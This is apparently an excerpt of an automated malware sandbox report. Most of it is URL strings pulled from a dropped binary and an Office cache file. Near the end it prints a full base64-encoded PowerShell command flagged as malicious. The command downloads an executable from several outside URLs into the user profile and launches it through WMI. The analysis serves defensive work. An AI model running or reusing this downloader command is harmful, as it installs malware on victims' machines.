    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/10/LOGO-MASTER.jpg?resize=300%2C179&
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/10/LOGO-MASTER.jpg?w=600&amp;ssl=1
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/02/fb10.jpg?fit=1656%2C1104&#038;ssl
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/02/fb10.jpg?fit=1656%2C1104&amp;ssl=
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/10632.jpg?fit=300%2C300&amp;ssl=1
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/10632.jpg?fit=480%2C480&amp;ssl=1
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/10632.jpg?resize=150%2C150&amp;ss
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/10632.jpg?resize=300%2C300&amp;ss
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/10632.jpg?resize=567%2C567&#038;s
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/10632.jpg?resize=567%2C567&amp;is
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/10632.jpg?resize=75%2C75&amp;ssl=
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/10632.jpg?w=480&amp;ssl=1
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/11.jpg?fit=300%2C200&amp;ssl=1
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/11.jpg?fit=771%2C514&amp;ssl=1
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/11.jpg?resize=300%2C200&amp;ssl=1
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/11.jpg?resize=768%2C512&amp;ssl=1
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/11.jpg?w=771&amp;ssl=1
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/11.jpg?w=800&#038;ssl=1
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/11.jpg?w=800&amp;is-pending-load=
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/9.jpg?fit=300%2C200&amp;ssl=1
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/9.jpg?fit=759%2C506&amp;ssl=1
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/9.jpg?resize=300%2C200&amp;ssl=1
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/9.jpg?w=759&amp;ssl=1
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/9.jpg?w=800&#038;ssl=1
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/9.jpg?w=800&amp;is-pending-load=1
    Source: 744.exe.1.drString found in binary or memory: https://i2.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/10/65623583_1777682085698087_5437773
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://lifecycle.office.com
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://login.microsoftonline.com/common
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://login.windows.local
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://management.azure.com
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://management.azure.com/
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://messaging.office.com/
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://ncus-000.contentsync.
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://officeapps.live.com
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://onedrive.live.com
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://retailer.osi.office.net/appstate/query
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 744.exe.1.drString found in binary or memory: https://schema.org
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://settings.outlook.com
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 744.exe.1.drString found in binary or memory: https://stats.wp.com/e-202031.js
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://tasks.office.com
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: 744.exe.1.drString found in binary or memory: https://themegrill.com/themes/colormag
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 744.exe.1.drString found in binary or memory: https://wordpress.org
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://wus2-000.contentsync.
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 744.exe.1.drString found in binary or memory: https://www.exactmetrics.com/
    Source: 744.exe.1.drString found in binary or memory: https://www.google-analytics.com/analytics.js
    Source: 744.exe.1.drString found in binary or memory: https://www.google.com/recaptcha/api.js?onload=cf7srLoadCallback&render=explicit
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/#organization
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/1-medium-mobile/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/65623583_1777682085698087_543777356850921472_n/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/?page_id=2266
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/booking/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/comments/feed/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/faqs-2/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/feed/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/logo-master/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/my-booking/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/photo-booth-hire/11-2/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/photo-booth-hire/9-2/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/photo-booth-hire/attachment/10632/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/photo-booth-hire/awards/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/photo-booth-hire/fun/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/photo-booth-hire/glitter/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/pricing/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/privacy-policy/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/reviews/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/t-cs/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/the-booth/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-admin/admin-ajax.php
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/contact-form-7-skins/css/framework/cf7s-default.css
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/contact-form-7-skins/css/framework/cf7s-normalize.c
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/contact-form-7-skins/skins/styles/vanilla/vanilla.c
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/contact-form-7/includes/css/styles.css
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/contact-form-7/includes/js/scripts.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/cookie-notice/css/front.min.css
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/cookie-notice/js/front.min.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/css/rating-display.css
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/css/rating-form.css
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/css/slider-controls-simp
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/js/controller.min.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/js/lib/actual/jquery-act
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/js/lib/form-validation/f
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/js/lib/strongslider/jque
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/js/lib/validate/jquery-v
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/js/lib/verge/verge.min.j
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/templates/default-form/form.css
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/templates/default/content.css
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/ultimate-faqs/css/ewd-ufaq-styles.css
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/ultimate-faqs/css/rrssb-min.css
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/youtube-embed/css/main.min.css
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/fontawesome/css/font-awesome.css
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/colormag-custom.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/fitvids/jquery.fitvids.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/html5shiv.min.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/jquery.bxslider.min.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/magnific-popup/jquery.magnific-popup.min
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/magnific-popup/magnific-popup.css
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/navigation.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/skip-link-focus-fix.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/sticky/jquery.sticky.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/style.css
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/uploads/2019/10/cropped-boo12345.jpg
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-includes/js/dist/vendor/wp-polyfill-url.min.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-includes/wlwmanifest.xml
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-json/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.groovyboove.co.uk%2F
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.groovyboove.co.uk%2F&#0
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/xmlrpc.php?rsd
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: 744.exe.1.drString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443

    E-Banking Fraud:

    barindex
    Malicious encrypted Powershell command line foundShow sources
    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e JABVAE0AQwBOAEwAbQBmAGUAPQAnAFIAVABFAE8ATQBjAGYAYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBVAFIASQBUAGAAeQBgAHAAcgBPAGAAVABvAEMATwBsACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQARQBEAE8AQQBXAGwAcQB2ACAAPQAgACcANwA0ADQAJwA7ACQASwBCAEEATgBIAGsAbQBvAD0AJwBaAEEARgBFAEIAdABxAHAAJwA7ACQAQwBRAEMAQwBXAHoAdwBuAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABFAEQATwBBAFcAbABxAHYAKwAnAC4AZQB4AGUAJwA7ACQAUABGAFAAVwBTAG0AZgB0AD0AJwBRAFEATQBVAFQAcwBiAGwAJwA7ACQATwBDAEQAWABEAHcAZQBrAD0ALgAoACcAbgBlAHcAJwArACcALQAnACsAJwBvAGIAagBlAGMAJwArACcAdAAnACkAIABOAEUAVAAuAFcARQBiAGMAbABJAGUATgBUADsAJABNAFgAWgBLAFUAYQBxAHIAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBoAGEAdABjAGgAZABvAGcAcwAuAGMAbwBtAC8AYQBzAHMAZQB0AHMALwBYAEkAdwAvACoAaAB0AHQAcABzADoALwAvAGcAcgBvAG8AdgB5AGIAbwBvAHYAZQAuAGMAbwAuAHUAawAvAGIAbABvAGcAcwAvADgAVAA5ADQAbQBtAGQAawBhADEAMwAvACoAaAB0AHQAcABzADoALwAvAGcAcgBlAGcAZQBtAGUAcgBzAG8AbgAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AaAB1AGQAeQAxADcAMgA0ADAALwAqAGgAdAB0AHAAOgAvAC8AZwB1AGEAcgBpAHoALgBjAG8AbQAuAGIAcgAvAFcAdQB1AHQAagBsAE8ALwAqAGgAdAB0AHAAOgAvAC8AaABhAGYAZABlAHIALgBjAG8AbQAvAGkAbQBhAGcAZQBzAC8AZgBoAHEANwBoADcAYgBhAGIAZABiAGUANQBxADUAMAA1ADIALwAnAC4AIgBTAHAATABgAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFUAWQBVAEMAWgB5AHMAZQA9ACcATABPAEQAVQBWAG0AcgBuACcAOwBmAG8AcgBlAGEAYwBoACgAJABaAFgAUgBWAFgAcABsAGIAIABpAG4AIAAkAE0AWABaAEsAVQBhAHEAcgApAHsAdAByAHkAewAkAE8AQwBEAFgARAB3AGUAawAuACIAZABPAGAAVwBuAGAAbABgAE8AYQBEAEYAaQBMAEUAIgAoACQAWgBYAFIAVgBYAHAAbABiACwAIAAkAEMAUQBDAEMAVwB6AHcAbgApADsAJABaAE4ASQBOAEkAbgB6AHcAPQAnAEEARQBHAE4ARABwAHkAdwAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAEMAUQBDAEMAVwB6AHcAbgApAC4AIgBsAGUAYABOAGcAdABoACIAIAAtAGcAZQAgADMAMwAyADkANQApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAYwByAEUAYABBAHQAZQAiACgAJABDAFEAQwBDAFcAegB3AG4AKQA7ACQATQBGAFIARQBOAGIAdABlAD0AJwBWAFYAWgBDAEcAZABiAHkAJwA7AGIAcgBlAGEAawA7ACQARwBQAEcARABDAGEAcgB6AD0AJwBYAEwATwBWAFkAdgB4AGIAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASQBKAFUATQBQAGkAcgBhAD0AJwBCAEMAQQBKAEIAcQBtAHAAJwA=